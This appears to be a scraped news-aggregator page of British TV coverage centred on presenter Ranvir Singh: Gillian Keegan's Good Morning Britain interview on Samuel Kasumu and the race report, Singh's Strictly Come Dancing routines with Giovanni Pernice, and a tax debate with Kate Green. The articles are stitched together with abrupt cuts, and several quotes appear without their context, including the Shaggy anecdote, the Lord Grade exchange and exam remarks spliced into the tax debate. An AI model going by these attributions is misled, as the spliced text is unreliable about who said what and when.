GMB: Ranvir grills Gillian Keegan on Kasumu’s resignation

Gillian Keegan, the Under-Secretary of State for Apprenticeships and Skills was invited onto Good Morning Britain today and her interview occurred just after the news had broken about Samuel Kasumu – Boris Johnson’s most senior black aide has quit his role in government following the results of a report into institutional racism were released. Presenters Ranvir Singh and Charlotte Hawkins were keen to ask her why Kasumu had left his position but the MP was adamant it was nothing something she was going to discuss, claiming it was a “professional” and “personal matter”.

“It’s a personal matter, so it’s not up to me to comment,” Keegan remarked.

Singh said Kasumu “wanted to resign in February but was talked out of it” he apparently agreed “politics was steep in division” before stating his resignation was a “public matter”.

“I disagree,” Keegan said. “If someone resigns, it’s a public matter. You would need to get the comment of why he’s resigning from him – that letter is not a comment from him.”

“You seem very defensive on this, it’s not a very good look from the government,” the presenter commented.

“No, I’m not defensive at all, I’m saying it’s a matter for him and I can’t defend or talk about why he’s resigned.” the guest explained.

In terms of the report though, it is an important report. It’s an independent report, so it’s not a government report… Of course, it has a lot of detail in there – 285 pages, I haven’t read all of it, but I’ve read a lot of it now – the Government is obviously considering that report and will respond to it.”

Hawkins then asked: “There’s this claim that there isn’t institutional racism anymore – do you agree?”

“You must read the report and not the reports of the report. I think that’s the most important thing,” Keegan replied.

“What they do, is they down to a very detailed data level and they look at what is happening, they look at disparities, they look at inequality, they do say there is racism.

“There is a lot of criticism in the report, there’s a lot of recommendations in the report as well.

“They do basically say there are a lot of disparities and inequalities and we need to do something about them. But the report has recognised all of these things,” she added.

“The 10 commissioners have spent a lot of time and effort, spoken to thousands of people and the minimum we can do is take this report seriously and read it and look at the recommendations and respond to it.”

Asked what is the reason Black Caribbean students are six times more likely to be excluded from school if it’s not systemic, Keegan added: “One of the things that I thought was interesting about the report is that we should not use this term BAME, we should look down into very individual differences.

“And for example, they pointed out the difference in Bangladeshi boys’ educational outcomes in London versus Bradford, how different they were.

“So they were saying sometimes there are other factors as well – geography is a factor, the socio-economic background is a factor, family history is a factor.

“So they looked at many different reasons and what they found was it wasn’t a uniformed picture by race, by different ethnicities, there were different things, and actually the most important thing is to get to policy – to solve the inequalities and the disparities – is you have to be able to act.

“And what actually the report does is get down to that level of detail where it isn’t actually high level,” she said.

GMB: Keegan refused to comment (Image: ITV)

In 2018, 5,084 Caribbean hopefuls applied for the Civil Service fast stream and none succeeded.

Keegan commented: “It’s not good enough… When you say structural racism it makes it out that there’s something there in the structure.

“When you have big differences based on geography, it doesn’t really support structural racism, it supports more nuanced differences.

“Are there occasions where people don’t get all the opportunities that they should, from different ethnic backgrounds? 100 percent there are. And do we need to do more about it? Yes, we do.”

“Do we need to offer more apprenticeships, apprenticeships are something I’m responsible for?

“We do have groups that look very much at how to encourage more from people of ethnic minorities to take up apprenticeships, they’re a massive social mobility tool and brilliant at getting you on in your careers, but we do need to make sure there is more awareness, that’s one of the recommendations in the report – we need to do more, definitely,” GMB viewers heard the MP say.

Commenting on the immediate review of safeguarding in schools and the new NSPCC helpline following the social movement of the Everyone’s Invited website where over 11,500 students have shared their experiences of sexual abuse, and asked why was nothing done after a similar report back in 2016, Keegan explained: “It’s not true to say nothing’s been done.

“We have updated our relationship, health and sexual education curriculum and that was introduced in May 2019, it became compulsory in schools from September 2020.

“We’ve also updated our keeping children safe in education guidance.”

Pressed that not enough has been done, Keegan went on: “…the Secretary of State has said he wants Ofsted to do a systematic review to understand what is working and what is not working well.

“The majority of schools take this very, very seriously and will have excellent processes and procedures in place, but we obviously do want to check that.

“There are distressing reports, but in addition there is a lot of other activity as well. We’ve got an Online Safety Bill going through Parliament at the moment, we’ve got a Violence Against Girls and Women bill going through Parliament at the moment,” she commented.

Giovanni had appeared on the ITV show to take part in its dance-a-long segment along with Strictly judge Craig Revel-Horwood.

But before they could show off their skills, Alison asked if Giovanni was still in contact with Ranvir.

“100 percent,” the Strictly pro replied: “I think Ranvir delivered a very, very good performance every week,

“And I’m sure Craig loved all of them – and yeah, we’re still in touch.”

“Because of your success on this show, you will be heartlessly ditching Good Morning Britain to pursue fame and fortune,” Piers jokingly put to his co-star.

Ranvir laughed off the claims before Piers asked: “Will we ever see you again, Ranvir, or is this the farewell?”

Putting his fears to bed, Ranvir replied: “Oh, my god. You will definitely see me again.

“Can I just honestly say that, as you know I don’t really read anything and none of these things come from me and I don’t really know what’s been said, but I love my job.”

Ranvir and Giovanni warned to ‘spice it up’ after ‘safe’ routine amid romance rumours https://briefnews.eu/ranvir-and-giovanni-warned-to-spice-it-up-after-safe-routine-amid-romance-rumours/ https://briefnews.eu/ranvir-and-giovanni-warned-to-spice-it-up-after-safe-routine-amid-romance-rumours/#respond Sun, 29 Nov 2020 15:49:14 +0000 https://briefnews.eu/ranvir-and-giovanni-warned-to-spice-it-up-after-safe-routine-amid-romance-rumours/

Having impressed week on week, Ranvir and Giovanni took on the American Smooth in the hopes of securing a spot in next week’s Strictly Come Dancing quarter-final. And the GMB star and her partner replicated their good form once more – although not all the judges felt they were giving their all. So much so, Craig Revel-Horwood and Motsi Mabuse encouraged the two to “spice things up” next time they take to the dance floor.

Giovanni and Ranvir, who’ve been at the centre of the Strictly romance rumour mill for weeks, didn’t seem to put a foot wrong in their routine on Saturday evening.

Sadly, the same couldn’t be said for the likes of Bill Bailey and Clara Amfo, who both were pulled up for missing steps in their respective dances.

However, the performance only received a moderate score of 24 from the judges, landing them in joint fourth on the leaderboard with only Clara and Aljaz beneath.

And despite Giovanni shouting “wonderful” and “beautiful” moments after the routine, Craig and Motsi had rather different approaches.

Shirley heaped the praise on the two before Motsi began her critique: “The secret about this partnership which I absolutely adore and love,

“Is the connection between you two guys, the partnering, it’s so important to have that – especially in the ballroom dances.

“We don’t see that much gapping anymore, you are allowed to open yourself up.

“I love that you are owning the dance floor, you are owning it. It has become your home.”

The Strictly stalwart weighed in: “I would’ve liked to have seen more interesting lifts.

“You’ve got an opportunity in this dance to do something spectacular and amazing.”

Giovanni appeared to disagree as he rolled his eyes and giggled before the judge continued: “You chose not to,

“Which is fine, you played safe, that’s alright – you need more finesse in your arms when you’re going in and out of holds.”

Craig then said one of the moments in the routine in which Ranvir placed her arm on Giovanni’s back landed “like a lead weight”.

So can fans be expecting a slightly more risqué performance from the two if they make it to next week’s quarter-final?

Ahead of the dreaded dance-off, however, Ranvir certainly isn’t safe as she, Bill and JJ all stand on 24 points.

Only Clara’s 19 point haul is worse – but will they survive to dance another day?

Strictly Come Dancing continues with its results show on Sunday on BBC One.

Giovanni Pernice and Ranvir Singh wowed the Strictly Come Dancing judges with their passionate Argentine Tango. Craig Revel Horwood, Shirley Ballas and Anton Du Beke praised the pair for being the first couple to tackle the notoriously difficult routine. However, before the pair had heard what the judges thought of the dance, Giovanni whispered a sweet message to his partner.

Once the dance had finished, Giovanni whispered “well done” into Ranvir’s ear before they left the dance floor.

Critiquing the dance, Anton said: “It was ooh what a beauty you are, I watched you the whole way round.

“I didn’t smile, I barely blinked then it was over. That is the perfect dance.

“It captured me completely. You have wonderful intensity.

Good Morning Britain’s Ranvir found out Giovanni Pernice would be her professional dance partner on Strictly Come Dancing during the launch show, which aired on Saturday evening. The journalist was shown out for a walk with her dog Schmizzles when Giovanni popped up and revealed they’d be dancing together. As they began chatting about her Strictly journey though, Schmizzles was caught up in his lead, and Ranvir’s co-stars couldn’t help but highlight the moment.

Kate and Sean struggled to hide their laughter as Ranvir was shown walking alongside Giovanni while Schmizzles became entangled in his lead.

“That poor dog!” Sean remarked. “I mean that poor dog just got dragged along.”

Kate chipped in: “You’ve got to see it. We’ve got to see it again.”

“I tell you what, we were there for five hours filming,” Ranvir disclosed as a clip of her meeting professional dancer Giovanni was shown.

Earlier in the show, Ranvir hit out at Kate as she claimed she hadn’t been warned how difficult dancing was.

“Can I just say Kate, you never told me how actually painful and hard it is to do the dancing,” Ranvir remarked.

Kate replied: “I think I might have done Ranvir. I might have said you’d have bruises in places you won’t expect.

“You were just so full of glitz and sequins.”

Following the launch night of Strictly, which saw the celebrities take on a group dance for the first time, Ranvir’s odds of winning are currently priced at 33/1 with Ladbrokes.

According to the bookmakers, only former Home Secretary Jacqui Smith is less likely to win with odds of 66/1.

Maisie Smith is currently still the favourite to win with odds of 7/4 while popstar HRVY is close behind with odds of 5/1.

Good Morning Britain airs weekdays on ITV at 6am.

However, during the meeting, BBC One viewers were quick to spot an awkward mishap between the newsreader and her pet pooch.

“You know I actually had a dream about you,” Ranvir confessed to the Strictly pro during the meet. “So dreams come true.”

Giovanni added: “She seems quite happy. And I am so, so happy.”

“Are we gonna have a laugh?” Ranvir tentatively asked, prompting Giovanni to joke: “I’m not sure about that.”

Ranvir Singh shuts down Labour MP Kate Green in heated tax debate: ‘Not true!’ https://briefnews.eu/ranvir-singh-shuts-down-labour-mp-kate-green-in-heated-tax-debate-not-true/ https://briefnews.eu/ranvir-singh-shuts-down-labour-mp-kate-green-in-heated-tax-debate-not-true/#respond Mon, 31 Aug 2020 08:11:10 +0000 https://briefnews.eu/ranvir-singh-shuts-down-labour-mp-kate-green-in-heated-tax-debate-not-true/

Ranvir Singh, 43, was joined by Labour‘s Shadow Education Secretary Kate Green, 60, to discuss the Government’s ongoing action plan to deal with the repercussions caused by coronavirus. One such topic they talked about was the Treasury considering increasing taxes by a hike of £20bn, which some Conservative backbenchers are warning against over worries it would cause greater economic hardship. When the Good Morning Britain presenter put to the politician how Labour would address the issue, the pair ended up talking over one another as they clashed on the ITV show.

The presenter asked Ms Green: “How would Labour start paying back everything that coronavirus has cost us with the furlough scheme and other things we are having to pay for?

“Rishi Sunak will inevitably have to raise taxes quite a lot, corporation tax, capital gains tax, does Labour support that?”

“Well we will have to see the detail of what Rishi Sunak’s tax proposals are, but obviously we will have to, first of all, protect people as the crisis continues,” the politician began.

“And some of the way in which some of the money has been spent has not been as effective, for example, the furlough scheme we would like to see extended for certain sectors that still can’t go back to work, instead of giving a job retention bonus to employers who might have kept their staff on anyway.

“In due course, once we have gone through the crisis and we’ve got people safely through it and can make sure people’s economic circumstances are also secure, of course, we are going to have to look at a fair model of raising money,” she continued before the presenter interrupted.

Ms Green added: “Taxing progressively so those who have more bear the biggest share of the burden,” but didn’t quite finish her sentence because the host spoke over the top of her.

“Kate, those people at the top are the ones who are employing people whose businesses have been very very badly affected during coronavirus,” Singh said as she shut down the Labour MP.

As they both fought to get their voices heard, the politician could be heard exclaiming: “No! Not true, not true.

The presenter continued, however, and explained: “There is a suggestion from business groups that tax rises, in particular, would choke off any kind of resurgence in the economy.”

The Shadow Education Secretary added: “Those contingency plans could include giving much greater clarity now to how teacher grading would work, how course work would be reflected and also having a proper and robust appeals process.

“I don’t think we need to assume today that it won’t be possible for an exams series to take place next summer.

“We’ve got to make sure it’s fair if and when it does but it is really important that the Government does the type of contingency plan that it totally failed to do.

“We saw what happened last month with the utter fiasco of GCSE, Btec and A-Level results. Issues are still not resolved and young people have been put in a horrible position.”

Taking to Twitter, viewers addressed the exams discussion as one wrote: “Wish some one would make a decision on whats happening with them.”

Another added: “If they’re not, the students should be given the same combined teacher assessments that were allowed this year.

“It’s only fair way, they’ve missed five months, not completed 1st year of 6th form, it would be unfair otherwise.”

Whilst a third commented: “All exams should be cancelled in the whole if the U.K. There is no way the children can catch up on work missed from March and work still to learn and learning reinforcement. Grades for this year should be based on teacher predictions again.”

Ranvir Singh and Adil Ray returned to Good Morning Britain today as the pair discussed the morning’s news headlines. Today’s show included a segment on British national Jagtar Singh Johal who is currently being detained in India. However, when Ranvir introduced Jagtar’s story, the GMB host had to apologise when a technical blunder meant the wrong video was shown to viewers.

The GMB presenters returned from an ad break and announced what would be coming up next in the ITV show.

Adil said: “It’s now over three years since British national Jagtar Singh Johal was arrested and detained by police in India as he shopped with his new wife.

“His family say they are desperately worried as they claim British consulate staff haven’t spoken to him since March.”

“Jaguar’s still awaiting trial with no charges yet being made against him. The family say that,” Ranvir continued.

“It’s almost been 1000 days since this all began, we’ll speak to a couple of people involved in Jagtar’s story in a moment.”

Introducing a video clip, she said: “Here’s Gillian Kelly with more on what’s happened.”

However, instead of a video detailing Jagtar’s story, footage of people walking around shops with face masks on was shown.

The voiceover could be heard saying: “We should all be doing [wearing masks] but the rules on covering up have been confusing.”

She asked: “Prince Harry is a fan. Tell us what happened when you met him. He busted some moves or did he sing to you? I can’t remember what happened.”

“It’s crazy, my daughter was there,” Shaggy revealed. “Her mum said, ‘Everything’s about the Prince, the Prince is coming to Jamaica. Daddy’s going to see the Prince.’

“She was like, ‘I want to see the Prince,’ and when she got there if you look at the picture, she didn’t want to [see him].

“Prince Harry was like, ‘I’ve never met anyone less impressed.’”

Ben quickly interrupted his guest and weighed in: “It’s not us that you need to feel sorry for, it’s out viewers.”

However Lord Grade wasn’t to be deterred as he hit back: “Your viewers, I’m delighted to hear the high numbers, I wish the numbers were as high as that when I was at ITV [laughs],

“Your viewers have access not just to – you’re not the only source of information and news to those viewers.”

When Ranvir and Ben continued to quiz their guest on the government’s stance, Lord Grade branded it “arrogant” for the show to expect a government minister to appear no matter, as Ranvir put it, “how hard the questions might be”.
